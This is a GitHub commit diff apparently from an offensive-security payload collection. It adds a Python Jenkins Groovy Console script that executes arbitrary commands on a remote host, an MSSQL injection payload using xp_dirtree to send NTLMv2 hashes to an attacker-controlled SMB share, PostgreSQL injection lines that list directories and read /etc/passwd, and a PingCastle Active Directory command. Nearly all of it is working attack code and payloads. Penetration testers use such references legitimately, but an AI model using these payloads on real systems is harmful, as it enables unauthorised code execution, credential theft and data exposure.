Jenkins Grrovy + MSSQL UNC + PostgreSQL list files

swisskyrepo · Feb 17, 2019 · 78c882f · 78c882f
1 parent eac4214
commit 78c882f
Show file tree

Hide file tree

Showing 4 changed files with 46 additions and 0 deletions.
diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
+# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
+import requests
+import sys
+
+print """
+Jenkins Groovy Console cmd runner.
+
+usage: ./jgc.py [HOST]
+
+Then type any command and wait for STDOUT output from remote machine.
+Type 'exit' to exit :)
+"""
+URL = sys.argv[1] + '/scriptText'
+HEADERS = {
+    'User-Agent': 'jgc'
+}
+
+while 1:
+    CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ")
+    if CMD == 'exit':
+        print "exiting...\n"
+        exit(0)
+
+    DATA = {
+        'script': 'println "{}".execute().text'.format(CMD)
+    }
+    result = requests.post(URL, headers=HEADERS, data=DATA)
+    print result.text
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -68,6 +68,11 @@
   ```
 
 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
+* [Ping Castle](https://github.com/vletoux/pingcastle)
+
+    ```powershell
+    pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
+    ```
 
 ## Most common paths to AD compromise
 

diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md
@@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1;
 RECONFIGURE;
 ```
 
+## MSSQL UNC Path
+
+MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
+
+```sql
+1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
+```
+
 ## MSSQL Make user DBA (DB admin)
 
 ```sql

diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md
@@ -26,9 +26,12 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
 ## PostgreSQL File Read
 
 ```sql
+select pg_ls_dir('./');
 select pg_read_file('PG_VERSION', 0, 200);
 ```
 
+NOTE: ``pg_read_file` doesn't accept the `/` character.
+
 ```sql
 CREATE TABLE temp(t TEXT);
 COPY temp FROM '/etc/passwd';